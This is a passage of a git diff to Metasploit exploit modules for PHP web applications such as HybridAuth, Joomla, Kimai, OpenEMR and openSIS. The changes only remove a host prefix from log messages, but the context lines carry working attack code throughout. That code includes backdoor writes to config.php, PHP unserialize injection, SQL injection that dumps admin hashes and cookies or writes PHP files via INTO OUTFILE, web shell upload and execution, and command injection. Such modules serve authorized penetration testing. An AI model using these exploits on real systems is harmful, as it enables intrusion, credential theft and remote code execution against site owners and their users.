HybridAuth version #{version} is not vulnerable" + vprint_error "HybridAuth version #{version} is not vulnerable" end end Exploit::CheckCode::Safe @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end # write backdoor - print_status "#{peer} - Writing backdoor to config.php" + print_status "Writing backdoor to config.php" payload_param = rand(1000) res = send_request_cgi( 'method' => 'POST', @@ -99,40 +99,40 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with Failure::Unknown, "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Wrote backdoor successfully" + print_good "Wrote backdoor successfully" else fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'" end # execute payload code = Rex::Text.encode_base64(payload.encoded) - print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)" + print_status "Sending payload to config.php backdoor (#{code.length} bytes)" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'config.php'), 'data' => "#{payload_param}=#{code}" }, 5) if !res - print_warning "#{peer} - No response" + print_warning "No response" elsif res.code == 404 fail_with Failure::NotFound, "#{peer} - Could not find config.php" elsif res.code == 200 || res.code == 500 - print_good "#{peer} - Sent payload successfully" + print_good "Sent payload successfully" end # remove backdoor - print_status "#{peer} - Removing backdoor from config.php" + print_status "Removing backdoor from config.php" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install.php'), 'data' => 'OPENID_ADAPTER_STATUS=' ) if !res - print_error "#{peer} - Connection failed" + print_error "Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Removed backdoor successfully" + print_good "Removed backdoor successfully" else - print_warning "#{peer} - Could not remove payload from config.php" + print_warning "Could not remove payload from config.php" end end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index 8544567488..e2b2f8b485 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote end def cookie_prefix - print_status("#{peer} - Checking for cookie prefix") + print_status("Checking for cookie prefix") cookie_prefix = "" res = send_request_cgi( { @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.get_cookies =~ /(.+)session/ - print_status("#{peer} - Cookie prefix #{$1} found") + print_status("Cookie prefix #{$1} found") cookie_prefix = $1 end return cookie_prefix @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -139,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}") + print_error("Exploit failed: #{res.code}") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"}) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index 4319647596..7836c4732d 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote @zip = zip_file.pack # First step: call restore to run _prepare() and get an initialized AKFactory - print_status("#{peer} - Sending PHP serialized object...") + print_status("Sending PHP serialized object...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory) modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1') - print_status("#{peer} - Sending initialized and modified AKFactory...") + print_status("Sending initialized and modified AKFactory...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(php_filename) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename) }, 2) diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index fa6e5d8723..a48ba48d99 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/ table_prefix = $1 - print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") + print_status("Retrieved table prefix [ #{table_prefix} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/ auth_cookie_part = $1[0...-1] - print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") + print_status("Retrieved admin cookie [ #{auth_cookie_part} ]") else fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") end @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ cookie_begin = $1 - print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") + print_status("Retrieved unauthenticated cookie [ #{cookie_begin} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") end @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /Administration - Control Panel/ - print_status("#{peer} - Successfully authenticated as Administrator") + print_status("Successfully authenticated as Administrator") else fail_with(Failure::Unknown, "#{peer} - Session failure") end @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alphanumeric(rand(10)+6) # Create file - print_status("#{peer} - Creating file [ #{filename}.php ]") + print_status("Creating file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote # Grab token if res && res.code == 303 && res.headers['Location'] location = res.headers['Location'] - print_status("#{peer} - Following redirect to [ #{location} ]") + print_status("Following redirect to [ #{location} ]") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -208,14 +208,14 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving template token if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") end if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ template_path = $1 - print_status("#{peer} - Template path [ #{template_path} ] retrieved") + print_status("Template path [ #{template_path} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") end @@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote filename_base64 = Rex::Text.encode_base64("/#{filename}.php") # Inject payload data into file - print_status("#{peer} - Insert payload into file [ #{filename}.php ]") + print_status("Insert payload into file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), @@ -248,14 +248,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ - print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") + print_status("Payload data inserted into [ #{filename}.php ]") else fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") end # Request payload register_files_for_cleanup("#{filename}.php") - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index cad27d9654..5d2cb35756 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and (res.code == 200 or res.code == 302) if res.body =~ /You are not authorised to view this resource/ - vprint_status("#{peer} - Joomla Media Manager Found but authentication required") + vprint_status("Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /<form action="(.*)" id="uploadForm"/ - vprint_status("#{peer} - Joomla Media Manager Found and authentication isn't required") + vprint_status("Joomla Media Manager Found and authentication isn't required") return Exploit::CheckCode::Detected end end @@ -174,18 +174,18 @@ class Metasploit3 < Msf::Exploit::Remote @username = datastore['USERNAME'] @password = datastore['PASSWORD'] - print_status("#{peer} - Checking Access to Media Component...") + print_status("Checking Access to Media Component...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ - print_status("#{peer} - Authentication required... Proceeding...") + print_status("Authentication required... Proceeding...") if @username.empty? or @password.empty? fail_with(Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials") end @cookies = res.get_cookies.sub(/;$/, "") - print_status("#{peer} - Accessing the Login Form...") + print_status("Accessing the Login Form...") res = get_login_form if res.nil? or (res.code != 200 and res.code != 302) or res.body !~ /login/ fail_with(Failure::Unknown, "#{peer} - Unable to Access the Login Form") @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/ - print_status("#{peer} - Authentication isn't required.... Proceeding...") + print_status("Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component") end - print_status("#{peer} - Accessing the Upload Form...") + print_status("Accessing the Upload Form...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and res.body =~ /<form action="(.*)" id="uploadForm"/ @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to Access the Upload Form") end - print_status("#{peer} - Uploading shell...") + print_status("Uploading shell...") res = upload(upload_uri) @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end register_files_for_cleanup("#{@upload_name}.") - print_status("#{peer} - Executing shell...") + print_status("Executing shell...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "images", @upload_name), diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb index b088c8e86f..51c9a53ffa 100644 --- a/modules/exploits/unix/webapp/kimai_sqli.rb +++ b/modules/exploits/unix/webapp/kimai_sqli.rb @@ -63,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if target is Kimai version 0.9.2.x # def check - vprint_status("#{peer} - Checking version...") + vprint_status("Checking version...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") }) if not res - vprint_error("#{peer} - Request timed out") + vprint_error("Request timed out") return Exploit::CheckCode::Unknown elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/ version = "#{$1}" - print_good("#{peer} - Found version: #{version}") + print_good("Found version: #{version}") if version >= "0.9.2" and version <= "0.9.2.1306" return Exploit::CheckCode::Appears end @@ -81,33 +81,33 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get file system path - print_status("#{peer} - Retrieving file system path...") + print_status("Retrieving file system path...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/ path = "#{$1}" - print_good("#{peer} - Found file system path: #{path}") + print_good("Found file system path: #{path}") else path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path) - print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'") + print_warning("Could not retrieve file system path. Assuming '#{path}'") end # Get MySQL table name prefix from temporary/logfile.txt - print_status("#{peer} - Retrieving MySQL table name prefix...") + print_status("Retrieving MySQL table name prefix...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/) table_prefix = "#{prefixes.flatten.last}" - print_good("#{peer} - Found table name prefix: #{table_prefix}") + print_good("Found table name prefix: #{table_prefix}") else table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path) - print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") + print_warning("Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") end # Create a backup ID - print_status("#{peer} - Creating a backup to get a valid backup ID...") + print_status("Creating a backup to get a valid backup ID...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/) id = "#{backup_ids.flatten.last}" - print_good("#{peer} - Found backup ID: #{id}") + print_good("Found backup ID: #{id}") else fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID") end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # Write PHP payload to disk using MySQL injection 'into outfile' fname = "#{rand_text_alphanumeric(rand(10)+10)}.php" sqli = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- " - print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") + print_status("Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -139,14 +139,14 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(fname) else - print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}") + print_error("Sending payload failed. Received HTTP code: #{res.code}") end # Remove the backup - print_status("#{peer} - Removing the backup...") + print_status("Removing the backup...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -156,15 +156,15 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if not res - print_warning("#{peer} - Request timed out") + print_warning("Request timed out") elsif res.code == 302 and res.body !~ /#{id}/ - vprint_good("#{peer} - Deleted backup with ID '#{id}'") + vprint_good("Deleted backup with ID '#{id}'") else - print_warning("#{peer} - Could not remove backup with ID '#{id}'") + print_warning("Could not remove backup with ID '#{id}'") end # Execute payload - print_status("#{peer} - Retrieving file '#{fname}'...") + print_status("Retrieving file '#{fname}'...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}") }, 5) diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 8030e347cc..b68a39ed2e 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -132,13 +132,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") orig_fname = upload(base) - print_status("#{peer} - Renaming #{orig_fname}...") + print_status("Renaming #{orig_fname}...") new_fname = rename(base, orig_fname) - print_status("#{peer} - Executing #{new_fname}...") + print_status("Executing #{new_fname}...") exec(base, new_fname) end end diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index fc9b180f61..8524edfb3a 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, @@ -84,13 +84,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = normalize_uri(target_uri.path, captures[0]) - print_good("#{peer} - Response parsed successfully") + print_good("Response parsed successfully") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index f5fdb49389..8660cf678d 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -83,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote def check sig = rand_text_alpha(rand(10) + 5) #The string to check - vprint_status("#{peer} - Looking for signature '#{sig}'...") + vprint_status("Looking for signature '#{sig}'...") res = remote_exe("echo #{sig}") if res and res.body =~ /#{sig}/ - vprint_status("#{peer} - Signature '#{sig}' found.") + vprint_status("Signature '#{sig}' found.") return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Signature not found") + vprint_status("Signature not found") return Exploit::CheckCode::Safe end end def exploit - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") remote_exe(payload.encoded) end diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index f8b6b04ba6..e7d56fcd2f 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -77,18 +77,18 @@ class Metasploit3 < Msf::Exploit::Remote # Check for ofc_upload_image.php # def check - print_status("#{peer} - Sending check") + print_status("Sending check") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"), }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No ofc_upload_image.php found") + vprint_error("No ofc_upload_image.php found") elsif res and res.code == 200 and res.body =~ /Saving your image to/ - vprint_status("#{peer} - Found ofc_upload_image.php") + vprint_status("Found ofc_upload_image.php") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote # Upload @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php" - print_status("#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") + print_status("Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body =~ /Saving your image to: (.+)#{@fname}/ path = $1 register_files_for_cleanup(@fname) - print_status("#{peer} - Executing '#{path}#{@fname}'") + print_status("Executing '#{path}#{@fname}'") else fail_with(Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 5672d926bd..8e91a2ef42 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version < "4.1.2" return Exploit::CheckCode::Appears @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end def login(base, name, pass) - #print_status("#{peer} - Logging in as non-admin user [ #{datastore['USER']} ]") + #print_status("Logging in as non-admin user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}", "interface", "main", "main_screen.php"), @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM users WHERE username = 0x61646d696e LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '#{sqlq}'='#{sqlq}" post_data = "form_pubpid=#{sqli}" - print_status("#{peer} - Retrieving admin password hash through SQLi") + print_status("Retrieving admin password hash through SQLi") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin password hash is [ #{adminhash} ]") + print_status("Admin password hash is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin password failed!") end @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading shell [ #{payload_name} ]") + print_status("Uploading shell [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "interface", "super", "manage_site_files.php"), @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") + print_status("Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "sites", "default", "images", "#{payload_name}") @@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index 6a25429929..df8f0518c8 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_name = rand_text_alpha(rand(10) + 5) + '.php' my_payload = payload.encoded - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_raw({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_error("#{peer} - Server returned #{res.code.to_s}") + print_error("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 9e01b897dc..25611c3bcb 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # def login(user, pass) @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php"), @@ -81,10 +81,10 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if res and res.code == 200 and res.body =~ /Portal\.php/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_command(cmd, opts = { :php_function => 'system' } ) code = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd+"&")) junk = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote def check return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") res = execute_command("echo #{fingerprint}") if res and res.body =~ /align=center>#{fingerprint}/ return Exploit::CheckCode::Vulnerable @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote ].sample res = execute_command(payload.encoded, { :php_function => php_function }) if res and res.code == 200 and res.body =~ /hacking_log/i - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 722f946e36..3c4ca54256 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send check - print_status("#{peer} - Sending check") + print_status("Sending check") begin res = send_request_cgi({ 'method' => 'GET', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send payload - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") begin res = send_request_cgi({ 'method' => 'GET', 